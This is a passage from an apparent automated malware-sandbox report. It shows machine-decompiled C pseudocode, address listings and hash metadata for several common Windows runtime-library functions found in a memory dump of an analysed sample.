					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E009C1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E009B7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E00A2FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E009D9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E009CE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L009EDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0xa86901;
								_push(_t109);
								_v52 = _t98;
								if( *0xa86901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E009D9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E009D95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E009B7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E009B7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00A17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00A2FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xa85350;
							if(_t109 != 0xa85350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00A2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00A25720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                                0x00992d8a
                                                                                                                0x00992d8a
                                                                                                                0x00992d92
                                                                                                                0x00992d96
                                                                                                                0x00992d9e
                                                                                                                0x00992da0
                                                                                                                0x00992da3
                                                                                                                0x00992da5
                                                                                                                0x00992da8
                                                                                                                0x00992dab
                                                                                                                0x00992db2
                                                                                                                0x009ef9aa
                                                                                                                0x009ef9ab
                                                                                                                0x009ef9ae
                                                                                                                0x009ef9ae
                                                                                                                0x00992db8
                                                                                                                0x00992dc2
                                                                                                                0x009ef9b9
                                                                                                                0x009ef9be
                                                                                                                0x009ef9bf
                                                                                                                0x009ef9bf
                                                                                                                0x00992dcf
                                                                                                                0x009ef9c9
                                                                                                                0x00992dd5
                                                                                                                0x00992dd5
                                                                                                                0x00992dd5
                                                                                                                0x00992dde
                                                                                                                0x00992de1
                                                                                                                0x00992e70
                                                                                                                0x00992e72
                                                                                                                0x00992e72
                                                                                                                0x00992de7
                                                                                                                0x00992deb
                                                                                                                0x00992e7c
                                                                                                                0x00992e83
                                                                                                                0x00992e85
                                                                                                                0x00992e8b
                                                                                                                0x00992e8d
                                                                                                                0x00992e92
                                                                                                                0x00992e92
                                                                                                                0x00992e85
                                                                                                                0x00992df1
                                                                                                                0x00992df7
                                                                                                                0x00992df9
                                                                                                                0x00992df9
                                                                                                                0x00992dfc
                                                                                                                0x00992dff
                                                                                                                0x00992e02
                                                                                                                0x00000000
                                                                                                                0x00992e05
                                                                                                                0x00992e0c
                                                                                                                0x009ef9d9
                                                                                                                0x00992e12
                                                                                                                0x00992e12
                                                                                                                0x00992e12
                                                                                                                0x00992e1a
                                                                                                                0x009ef9e3
                                                                                                                0x009ef9e9
                                                                                                                0x009ef9f0
                                                                                                                0x009ef9f6
                                                                                                                0x009ef9f8
                                                                                                                0x009ef9f8
                                                                                                                0x009ef9f0
                                                                                                                0x00992e23
                                                                                                                0x009efa02
                                                                                                                0x009efa03
                                                                                                                0x009efa05
                                                                                                                0x009efa06
                                                                                                                0x00000000
                                                                                                                0x00992e29
                                                                                                                0x00992e29
                                                                                                                0x00992e2e
                                                                                                                0x00992e34
                                                                                                                0x00992e3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00992e44
                                                                                                                0x00992e47
                                                                                                                0x00992e4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00992e4f
                                                                                                                0x00992e54
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00992e5a
                                                                                                                0x00992e5f
                                                                                                                0x00992e9a
                                                                                                                0x00992ea4
                                                                                                                0x00992ea5
                                                                                                                0x00992ea8
                                                                                                                0x00992eaf
                                                                                                                0x00992eb2
                                                                                                                0x00992eb5
                                                                                                                0x009efae9
                                                                                                                0x009efaeb
                                                                                                                0x009efaed
                                                                                                                0x009efaef
                                                                                                                0x009efaf7
                                                                                                                0x009efaf8
                                                                                                                0x009efafd
                                                                                                                0x009efaff
                                                                                                                0x009efb04
                                                                                                                0x009efb04
                                                                                                                0x009efaff
                                                                                                                0x00992ec0
                                                                                                                0x00992ec4
                                                                                                                0x00992ec6
                                                                                                                0x00992ec8
                                                                                                                0x009efb14
                                                                                                                0x009efb18
                                                                                                                0x009efb1e
                                                                                                                0x009efb21
                                                                                                                0x009efb21
                                                                                                                0x00992ece
                                                                                                                0x00992ece
                                                                                                                0x00992ece
                                                                                                                0x00992ed7
                                                                                                                0x00992e61
                                                                                                                0x00992e63
                                                                                                                0x009efa6b
                                                                                                                0x009efa71
                                                                                                                0x009efa76
                                                                                                                0x009efa78
                                                                                                                0x009efa8a
                                                                                                                0x009efa7a
                                                                                                                0x009efa83
                                                                                                                0x009efa83
                                                                                                                0x009efa8f
                                                                                                                0x009efa91
                                                                                                                0x009efa97
                                                                                                                0x009efa9d
                                                                                                                0x009efaa4
                                                                                                                0x009efaaa
                                                                                                                0x009efaaf
                                                                                                                0x009efab1
                                                                                                                0x009efac3
                                                                                                                0x009efab3
                                                                                                                0x009efabc
                                                                                                                0x009efabc
                                                                                                                0x009efac8
                                                                                                                0x009efacb
                                                                                                                0x009efadf
                                                                                                                0x009efadf
                                                                                                                0x009efacb
                                                                                                                0x009efaa4
                                                                                                                0x009efa91
                                                                                                                0x00992e6f
                                                                                                                0x00992e6f
                                                                                                                0x00992e5f
                                                                                                                0x009efa13
                                                                                                                0x009efa15
                                                                                                                0x009efa17
                                                                                                                0x009efa1f
                                                                                                                0x009efa21
                                                                                                                0x009efa22
                                                                                                                0x009efa25
                                                                                                                0x009efa28
                                                                                                                0x009efa2f
                                                                                                                0x009efa2f
                                                                                                                0x009efa2a
                                                                                                                0x009efa2a
                                                                                                                0x009efa2a
                                                                                                                0x009efa31
                                                                                                                0x009efa34
                                                                                                                0x009efa36
                                                                                                                0x009efa3c
                                                                                                                0x009efa3e
                                                                                                                0x009efa41
                                                                                                                0x009efa43
                                                                                                                0x009efa45
                                                                                                                0x009efa45
                                                                                                                0x009efa41
                                                                                                                0x009efa3c
                                                                                                                0x009efa4a
                                                                                                                0x009efa4f
                                                                                                                0x009efa51
                                                                                                                0x009efa53
                                                                                                                0x009efa56
                                                                                                                0x009efa5b
                                                                                                                0x009efa5e
                                                                                                                0x00000000
                                                                                                                0x009efa5e
                                                                                                                0x00992e23

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                • API String ID: 0-316354757
                                                                                                                • Opcode ID: 8954b9feb0d26a2722c6aeea16d3c49df6cf9867c57ada94a1901ec18dc0b585
                                                                                                                • Instruction ID: 8751a1e2a62afb1316aff66a161809a55b2867e3d7e7063e977e7344f07e850b
                                                                                                                • Opcode Fuzzy Hash: 8954b9feb0d26a2722c6aeea16d3c49df6cf9867c57ada94a1901ec18dc0b585
                                                                                                                • Instruction Fuzzy Hash: 8A613731A00684AFDF32DFADC894B7E77A9EB84310F24067AE8159B2C1D7349D41C781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A60EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 80%
                                                                                                                			E00A60EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(L00A5FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00A61074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E009D9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00A5A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00A5A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xa88b04 >> 0x14) + (_v44 -  *0xa88b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E009B7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00A5138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E009B7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00A4FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xa88724 & 0x00000008) != 0) {
						E00A552F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00A615B5(0xa88ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                                0x00a60eb7
                                                                                                                0x00a60eb9
                                                                                                                0x00a60ec0
                                                                                                                0x00a60ec2
                                                                                                                0x00a60ecd
                                                                                                                0x00a6105b
                                                                                                                0x00a6105b
                                                                                                                0x00a61061
                                                                                                                0x00a61066
                                                                                                                0x00a61066
                                                                                                                0x00a6106b
                                                                                                                0x00a61073
                                                                                                                0x00a61073
                                                                                                                0x00a60ed3
                                                                                                                0x00a60ed6
                                                                                                                0x00a60edc
                                                                                                                0x00a60ee0
                                                                                                                0x00a60ee7
                                                                                                                0x00a60ef0
                                                                                                                0x00a60ef5
                                                                                                                0x00a60efa
                                                                                                                0x00a60efc
                                                                                                                0x00a60efd
                                                                                                                0x00a60f03
                                                                                                                0x00a60f04
                                                                                                                0x00a60f06
                                                                                                                0x00a60f07
                                                                                                                0x00a60f09
                                                                                                                0x00a60f0e
                                                                                                                0x00a60f14
                                                                                                                0x00a60f23
                                                                                                                0x00a60f2d
                                                                                                                0x00a60f34
                                                                                                                0x00a60f34
                                                                                                                0x00a60f14
                                                                                                                0x00a60f52
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a60f58
                                                                                                                0x00a60f73
                                                                                                                0x00a60f74
                                                                                                                0x00a60f79
                                                                                                                0x00a60f7d
                                                                                                                0x00a60f80
                                                                                                                0x00a60f86
                                                                                                                0x00a60fab
                                                                                                                0x00a60fb5
                                                                                                                0x00a60fc6
                                                                                                                0x00a60fd1
                                                                                                                0x00a60fe3
                                                                                                                0x00a60fd3
                                                                                                                0x00a60fdc
                                                                                                                0x00a60fdc
                                                                                                                0x00a60feb
                                                                                                                0x00a61009
                                                                                                                0x00a61009
                                                                                                                0x00a61015
                                                                                                                0x00a61027
                                                                                                                0x00a61017
                                                                                                                0x00a61020
                                                                                                                0x00a61020
                                                                                                                0x00a6102f
                                                                                                                0x00a6103c
                                                                                                                0x00a6103c
                                                                                                                0x00a61048
                                                                                                                0x00a61050
                                                                                                                0x00a61050
                                                                                                                0x00a61055
                                                                                                                0x00000000
                                                                                                                0x00a61055
                                                                                                                0x00a60f88
                                                                                                                0x00a60f9e
                                                                                                                0x00a60fa2
                                                                                                                0x00a60fa9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a60fa9
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 27873cd3a0d46342050d98dea68dedf3dd5f7d7a218ed806b2edcf8247d05edc
                                                                                                                • Instruction ID: e09852884be3c12f6850e23de793b67403f55e5f4a32938dd9d8f807ca42c88d
                                                                                                                • Opcode Fuzzy Hash: 27873cd3a0d46342050d98dea68dedf3dd5f7d7a218ed806b2edcf8247d05edc
                                                                                                                • Instruction Fuzzy Hash: DC51BD712043419FD724DF28D981F1BBBF5EBC4714F084A2CF99687291D670E889CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009CF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E009CF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E009B4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E009D9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E009D9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E009D95D0();
							goto L11;
						} else {
							_t109 = L009B4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E009DF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E009D95D0();
										L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                                0x009cf0d3
                                                                                                                0x009cf0d9
                                                                                                                0x009cf0e0
                                                                                                                0x009cf0e7
                                                                                                                0x009cf0f2
                                                                                                                0x009cf0f4
                                                                                                                0x009cf0f8
                                                                                                                0x009cf100
                                                                                                                0x009cf108
                                                                                                                0x009cf10d
                                                                                                                0x009cf115
                                                                                                                0x009cf116
                                                                                                                0x009cf11f
                                                                                                                0x009cf123
                                                                                                                0x009cf124
                                                                                                                0x009cf12c
                                                                                                                0x009cf130
                                                                                                                0x009cf134
                                                                                                                0x009cf13d
                                                                                                                0x009cf144
                                                                                                                0x009cf14b
                                                                                                                0x009cf152
                                                                                                                0x00a0bab0
                                                                                                                0x00a0bab0
                                                                                                                0x009cf158
                                                                                                                0x009cf158
                                                                                                                0x009cf15a
                                                                                                                0x009cf160
                                                                                                                0x009cf165
                                                                                                                0x009cf166
                                                                                                                0x009cf16f
                                                                                                                0x009cf173
                                                                                                                0x00a0baa7
                                                                                                                0x00a0baa7
                                                                                                                0x00a0baab
                                                                                                                0x00000000
                                                                                                                0x009cf179
                                                                                                                0x009cf18d
                                                                                                                0x009cf191
                                                                                                                0x00a0baa2
                                                                                                                0x00000000
                                                                                                                0x009cf197
                                                                                                                0x009cf19b
                                                                                                                0x009cf1a2
                                                                                                                0x009cf1a9
                                                                                                                0x009cf1af
                                                                                                                0x009cf1b2
                                                                                                                0x009cf1b6
                                                                                                                0x009cf1b9
                                                                                                                0x009cf1c4
                                                                                                                0x009cf1d8
                                                                                                                0x009cf1df
                                                                                                                0x009cf1e3
                                                                                                                0x009cf1eb
                                                                                                                0x009cf1ee
                                                                                                                0x009cf1f4
                                                                                                                0x009cf20f
                                                                                                                0x00a0bab7
                                                                                                                0x00a0babb
                                                                                                                0x00a0bacc
                                                                                                                0x00a0bad1
                                                                                                                0x009cf215
                                                                                                                0x009cf218
                                                                                                                0x009cf226
                                                                                                                0x009cf22b
                                                                                                                0x00000000
                                                                                                                0x009cf22b
                                                                                                                0x009cf1f6
                                                                                                                0x009cf1f6
                                                                                                                0x009cf1f9
                                                                                                                0x009cf1fb
                                                                                                                0x009cf1fb
                                                                                                                0x009cf1f4
                                                                                                                0x009cf191
                                                                                                                0x009cf173
                                                                                                                0x009cf152
                                                                                                                0x009cf203

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction ID: 3a5c981b44920f5f3b6fac2348d2fbaa8f87c2563862a34fd3ca19ba2a4f6efb
                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction Fuzzy Hash: 5F517971604710ABC320DF58C841B6BB7F9BF88750F008A2EF99587691E7B4E904CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A13540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E00A13540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xa8d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E009D0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00A13706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E009DFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00A13540;
						E009DFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E009EDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00A20C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E009D97C0();
					}
					return E009DB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00A13971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00A13884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E009DFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E009D9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00A13787(_a4,  &_v352, _t80);
						}
					}
					L009B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E009D95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                                0x00a13552
                                                                                                                0x00a1355a
                                                                                                                0x00a1355d
                                                                                                                0x00a13566
                                                                                                                0x00a13567
                                                                                                                0x00a1357e
                                                                                                                0x00a1358f
                                                                                                                0x00a135a1
                                                                                                                0x00a135a5
                                                                                                                0x00a1366b
                                                                                                                0x00a1366b
                                                                                                                0x00a1366d
                                                                                                                0x00a13672
                                                                                                                0x00a13679
                                                                                                                0x00a13685
                                                                                                                0x00a1368d
                                                                                                                0x00a1369d
                                                                                                                0x00a136a7
                                                                                                                0x00a136b8
                                                                                                                0x00a136c6
                                                                                                                0x00a136c7
                                                                                                                0x00a136dc
                                                                                                                0x00a136e1
                                                                                                                0x00a136e7
                                                                                                                0x00a136e9
                                                                                                                0x00a136e9
                                                                                                                0x00a13703
                                                                                                                0x00a13703
                                                                                                                0x00a135b5
                                                                                                                0x00a135c0
                                                                                                                0x00a135c4
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00a135ca
                                                                                                                0x00a135d7
                                                                                                                0x00a135e2
                                                                                                                0x00a135e6
                                                                                                                0x00a135e8
                                                                                                                0x00a135f5
                                                                                                                0x00a135fa
                                                                                                                0x00a13603
                                                                                                                0x00a13604
                                                                                                                0x00a13609
                                                                                                                0x00a1360a
                                                                                                                0x00a13612
                                                                                                                0x00a13613
                                                                                                                0x00a1361e
                                                                                                                0x00a13622
                                                                                                                0x00a13628
                                                                                                                0x00a1362f
                                                                                                                0x00a1362f
                                                                                                                0x00a13636
                                                                                                                0x00a13638
                                                                                                                0x00a1363b
                                                                                                                0x00a13642
                                                                                                                0x00a13642
                                                                                                                0x00a13636
                                                                                                                0x00a13657
                                                                                                                0x00a13657
                                                                                                                0x00a1365c
                                                                                                                0x00a13662
                                                                                                                0x00a13669
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 0-2202222882
                                                                                                                • Opcode ID: adf54daff85ded9f992194e488a854739c656bb7bfbdabbc462bb77bc0b49b36
                                                                                                                • Instruction ID: cc4009857266df68c71a72a4033c7f8bdf0f4903658adf72bcb1cf8ee76fa59e
                                                                                                                • Opcode Fuzzy Hash: adf54daff85ded9f992194e488a854739c656bb7bfbdabbc462bb77bc0b49b36
                                                                                                                • Instruction Fuzzy Hash: 174132F290052CAADF21DE54CC81FEEB77CAB44714F0085A5BA19AB241DB709F888F94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00A605AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00A605AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00A607DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
